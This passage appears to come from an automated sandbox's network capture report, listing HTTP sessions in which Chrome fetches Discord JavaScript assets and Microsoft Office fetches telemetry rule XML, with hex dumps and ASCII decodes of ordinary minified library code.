                                                                                                                                                                                                                                                                                    Data Ascii: ion(r){var t=c(r);if(e(t,a))return t[a];var o=t.constructor;return n(o)&&t instanceof o?o.prototype:t instanceof f?E:null}},835884:function(r,t,o){var e=o(222531),n=o(202234);r.exports=Object.keys||function(r){return e(r,n)}},276321:function(r,t,o){var e=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC1369INData Raw: 20 6d 28 31 2c 32 29 2c 79 3d 6d 26 26 6c 26 26 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 64 29 2c 4e 3d 21 21 79 26 26 21 28 79 2e 77 72 69 74 61 62 6c 65 26 26 79 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 29 2c 68 3d 76 26 26 21 4e 26 26 21 54 3b 65 28 7b 67 6c 6f 62 61 6c 3a 21 30 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 21 30 2c 66 6f 72 63 65 64 3a 5f 7c 7c 68 7d 2c 7b 44 4f 4d 45 78 63 65 70 74 69 6f 6e 3a 68 3f 49 3a 6d 7d 29 3b 76 61 72 20 44 3d 63 28 64 29 2c 53 3d 44 2e 70 72 6f 74 6f 74 79 70 65 3b 69 66 28 53 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 44 29 7b 66 6f 72 28 76 61 72 20 62 20 69 6e 21 5f 26 26 75 28 53 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 2c 69 28 31 2c 44 29 29 2c 70
                                                                                                                                                                                                                                                                                    Data Ascii: m(1,2),y=m&&l&&Object.getOwnPropertyDescriptor(n,d),N=!!y&&!(y.writable&&y.configurable),h=v&&!N&&!T;e({global:!0,constructor:!0,forced:_||h},{DOMException:h?I:m});var D=c(d),S=D.prototype;if(S.constructor!==D){for(var b in!_&&u(S,"constructor",i(1,D)),p
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC1201INData Raw: 6c 65 74 7b 50 49 3a 74 2c 6d 69 6e 3a 6f 2c 6d 61 78 3a 6e 2c 63 6f 73 3a 63 2c 72 6f 75 6e 64 3a 69 7d 3d 4d 61 74 68 2c 75 3d 72 5b 30 5d 7c 72 5b 31 5d 3c 3c 38 7c 72 5b 32 5d 3c 3c 31 36 2c 61 3d 72 5b 33 5d 7c 72 5b 34 5d 3c 3c 38 2c 66 3d 28 36 33 26 75 29 2f 36 33 2c 45 3d 28 75 3e 3e 36 26 36 33 29 2f 33 31 2e 35 2d 31 2c 73 3d 28 75 3e 3e 31 32 26 36 33 29 2f 33 31 2e 35 2d 31 2c 70 3d 75 3e 3e 32 33 2c 52 3d 61 3e 3e 31 35 2c 6c 3d 6e 28 33 2c 52 3f 70 3f 35 3a 37 3a 37 26 61 29 2c 5f 3d 6e 28 33 2c 52 3f 37 26 61 3a 70 3f 35 3a 37 29 2c 64 3d 70 3f 28 31 35 26 72 5b 35 5d 29 2f 31 35 3a 31 2c 4f 3d 28 72 5b 35 5d 3e 3e 34 29 2f 31 35 2c 6d 3d 70 3f 36 3a 35 2c 49 3d 30 2c 41 3d 28 74 2c 6f 2c 65 29 3d 3e 7b 6c 65 74 20 6e 3d 5b 5d 3b 66 6f 72
                                                                                                                                                                                                                                                                                    Data Ascii: let{PI:t,min:o,max:n,cos:c,round:i}=Math,u=r[0]|r[1]<<8|r[2]<<16,a=r[3]|r[4]<<8,f=(63&u)/63,E=(u>>6&63)/31.5-1,s=(u>>12&63)/31.5-1,p=u>>23,R=a>>15,l=n(3,R?p?5:7:7&a),_=n(3,R?7&a:p?5:7),d=p?(15&r[5])/15:1,O=(r[5]>>4)/15,m=p?6:5,I=0,A=(t,o,e)=>{let n=[];for


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    96192.168.2.549821162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC673OUTGET /assets/d67c5e680608266a1f63.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC970INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:47 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 7728
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0ef4ef5728a-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "1c6b9d0ad743762986197ae0e81874c1"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 28 Jun 2024 00:43:11 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b7sYGBm5IvD5N66V4Y8A0oHiyHhVOFHYc6rVm2ZXo%2BSQtTH3%2FvNsN5oq9vkguV7WvWZjfb7%2Bf28NlIdNzeFwdMAfzksXelAbm8pBCPXQBuwri%2FbCVLiN1YhFPqPC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC399INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 35 34 39 32 22 5d 2c 7b 38 34 39 31 34 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 4d 61 70 29 72 65 74 75 72 6e 20 4d 61 70 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 76 61 72 20 6e 3d 2d 31 3b 72 65 74 75 72 6e 20 74 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 74 5b 30 5d 3d 3d 3d 65 26 26 28 6e 3d 72 2c 21 30 29 7d 29 2c 6e 7d
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["75492"],{849146:function(t,e,n){var r=function(){if("undefined"!=typeof Map)return Map;function t(t,e){var n=-1;return t.some(function(t,r){return t[0]===e&&(n=r,!0)}),n}
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 68 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 28 74 68 69 73 2e 5f 5f 65 6e 74 72 69 65 73 5f 5f 2c 65 29 2c 72 3d 74 68 69 73 2e 5f 5f 65 6e 74 72 69 65 73 5f 5f 5b 6e 5d 3b 72 65 74 75 72 6e 20 72 26 26 72 5b 31 5d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 74 28 74 68 69 73 2e 5f 5f 65 6e 74 72 69 65 73 5f 5f 2c 65 29 3b 7e 72 3f 74 68 69 73 2e 5f 5f 65 6e 74 72 69 65 73 5f 5f 5b 72 5d 5b 31 5d 3d 6e 3a 74 68 69 73 2e 5f 5f 65 6e 74 72 69 65 73 5f 5f 2e 70 75 73 68 28 5b 65 2c 6e 5d 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                                                                    Data Ascii: h},enumerable:!0,configurable:!0}),e.prototype.get=function(e){var n=t(this.__entries__,e),r=this.__entries__[n];return r&&r[1]},e.prototype.set=function(e,n){var r=t(this.__entries__,e);~r?this.__entries__[r][1]=n:this.__entries__.push([e,n])},e.prototyp
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 6f 6e 20 61 28 29 7b 76 61 72 20 74 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 69 66 28 6e 29 7b 69 66 28 74 2d 69 3c 32 29 72 65 74 75 72 6e 3b 72 3d 21 30 7d 65 6c 73 65 20 6e 3d 21 30 2c 72 3d 21 31 2c 73 65 74 54 69 6d 65 6f 75 74 28 63 2c 32 30 29 3b 69 3d 74 7d 72 65 74 75 72 6e 20 61 7d 28 74 68 69 73 2e 72 65 66 72 65 73 68 2e 62 69 6e 64 28 74 68 69 73 29 2c 32 30 29 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 4f 62 73 65 72 76 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 21 7e 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5f 2e 69 6e 64 65 78 4f 66 28 74 29 26 26 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5f 2e 70 75 73 68 28 74 29 2c 21 74 68 69 73 2e 63 6f 6e 6e 65 63 74 65 64 5f 26 26 74 68 69 73 2e 63 6f 6e 6e 65 63 74 5f 28 29
                                                                                                                                                                                                                                                                                    Data Ascii: on a(){var t=Date.now();if(n){if(t-i<2)return;r=!0}else n=!0,r=!1,setTimeout(c,20);i=t}return a}(this.refresh.bind(this),20)}return t.prototype.addObserver=function(t){!~this.observers_.indexOf(t)&&this.observers_.push(t),!this.connected_&&this.connect_()
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 64 5f 26 26 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 53 75 62 74 72 65 65 4d 6f 64 69 66 69 65 64 22 2c 74 68 69 73 2e 72 65 66 72 65 73 68 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 4f 62 73 65 72 76 65 72 5f 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 45 76 65 6e 74 73 41 64 64 65 64 5f 3d 21 31 2c 74 68 69 73 2e 63 6f 6e 6e 65 63 74 65 64 5f 3d 21 31 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 5f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 70 72 6f 70 65 72 74 79 4e 61 6d 65 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 22 22 3a 65 3b 63 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 21 21 7e 6e
                                                                                                                                                                                                                                                                                    Data Ascii: d_&&document.removeEventListener("DOMSubtreeModified",this.refresh),this.mutationsObserver_=null,this.mutationEventsAdded_=!1,this.connected_=!1},t.prototype.onTransitionEnd_=function(t){var e=t.propertyName,n=void 0===e?"":e;c.some(function(t){return!!~n
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 66 28 21 65 26 26 21 6e 29 72 65 74 75 72 6e 20 64 3b 76 61 72 20 72 3d 66 28 74 29 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 7b 7d 2c 6e 3d 30 2c 72 3d 5b 22 74 6f 70 22 2c 22 72 69 67 68 74 22 2c 22 62 6f 74 74 6f 6d 22 2c 22 6c 65 66 74 22 5d 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 72 5b 6e 5d 2c 6f 3d 74 5b 22 70 61 64 64 69 6e 67 2d 22 2b 69 5d 3b 65 5b 69 5d 3d 70 28 6f 29 7d 72 65 74 75 72 6e 20 65 7d 28 72 29 2c 6f 3d 69 2e 6c 65 66 74 2b 69 2e 72 69 67 68 74 2c 73 3d 69 2e 74 6f 70 2b 69 2e 62 6f 74 74 6f 6d 2c 63 3d 70 28 72 2e 77 69 64 74 68 29 2c 61 3d 70 28 72 2e 68 65 69 67 68 74 29 3b 69 66 28 22 62 6f 72 64 65 72 2d 62
                                                                                                                                                                                                                                                                                    Data Ascii: f(!e&&!n)return d;var r=f(t).getComputedStyle(t),i=function(t){for(var e={},n=0,r=["top","right","bottom","left"];n<r.length;n++){var i=r[n],o=t["padding-"+i];e[i]=p(o)}return e}(r),o=i.left+i.right,s=i.top+i.bottom,c=p(r.width),a=p(r.height);if("border-b
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 22 31 20 61 72 67 75 6d 65 6e 74 20 72 65 71 75 69 72 65 64 2c 20 62 75 74 20 6f 6e 6c 79 20 30 20 70 72 65 73 65 6e 74 2e 22 29 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 45 6c 65 6d 65 6e 74 7c 7c 21 28 45 6c 65 6d 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 4f 62 6a 65 63 74 29 29 72 65 74 75 72 6e 3b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 66 28 74 29 2e 45 6c 65 6d 65 6e 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 27 70 61 72 61 6d 65 74 65 72 20 31 20 69 73 20 6e 6f 74 20 6f 66 20 74 79 70 65 20 22 45 6c 65 6d 65 6e 74 22 2e 27 29 3b 76 61 72 20 65 3d 74 68 69 73 2e 6f 62 73 65 72 76 61 74 69 6f 6e 73 5f 3b 69 66 28 21 65 2e 68 61 73 28 74 29 29 65 2e 73 65 74 28 74 2c 6e 65 77 20 62 28 74 29
                                                                                                                                                                                                                                                                                    Data Ascii: "1 argument required, but only 0 present.");if("undefined"==typeof Element||!(Element instanceof Object))return;if(!(t instanceof f(t).Element))throw TypeError('parameter 1 is not of type "Element".');var e=this.observations_;if(!e.has(t))e.set(t,new b(t)
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC484INData Raw: 61 6b 4d 61 70 3a 6e 65 77 20 72 2c 77 3d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 2e 22 29 3b 69 66 28 21 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 31 20 61 72 67 75 6d 65 6e 74 20 72 65 71 75 69 72 65 64 2c 20 62 75 74 20 6f 6e 6c 79 20 30 20 70 72 65 73 65 6e 74 2e 22 29 3b 76 61 72 20 6e 3d 6e 65 77 20 79 28 65 2c 68 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 29 2c 74 68 69 73 29 3b 67 2e 73 65 74 28 74 68 69 73 2c 6e 29 7d 3b 5b 22 6f 62 73 65 72 76 65 22 2c 22 75 6e 6f 62 73
                                                                                                                                                                                                                                                                                    Data Ascii: akMap:new r,w=function t(e){if(!(this instanceof t))throw TypeError("Cannot call a class as a function.");if(!arguments.length)throw TypeError("1 argument required, but only 0 present.");var n=new y(e,h.getInstance(),this);g.set(this,n)};["observe","unobs


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    97192.168.2.54981613.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:47 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201247Z-178bfbc474bxkclvhC1NYC69g400000004ug00000000dxa3
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    98192.168.2.54981913.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                    x-ms-request-id: f323d95e-101e-0065-6a6f-3d4088000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201247Z-15b8b599d88pxmdghC1TEBux9c00000003eg00000000gq10
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    99192.168.2.549823162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC862OUTGET /assets/b54790681a89c77f55ad.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 16272
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0f03acc0c86-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "1ce0867ef5ab681018d7e32e7197dd4d"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 15 Nov 2024 23:00:49 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ymDc4mppKQXmduEr1XsMigAZfDwkPtTzdHwh3X92sagHQ8kHBqcy0lg261caP1g1fl67dgcI5adGvpy3K6cxzAPS%2BKUkWsSUWgGoFmkQhJ%2FOb1BI50wWjfYF579Q"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
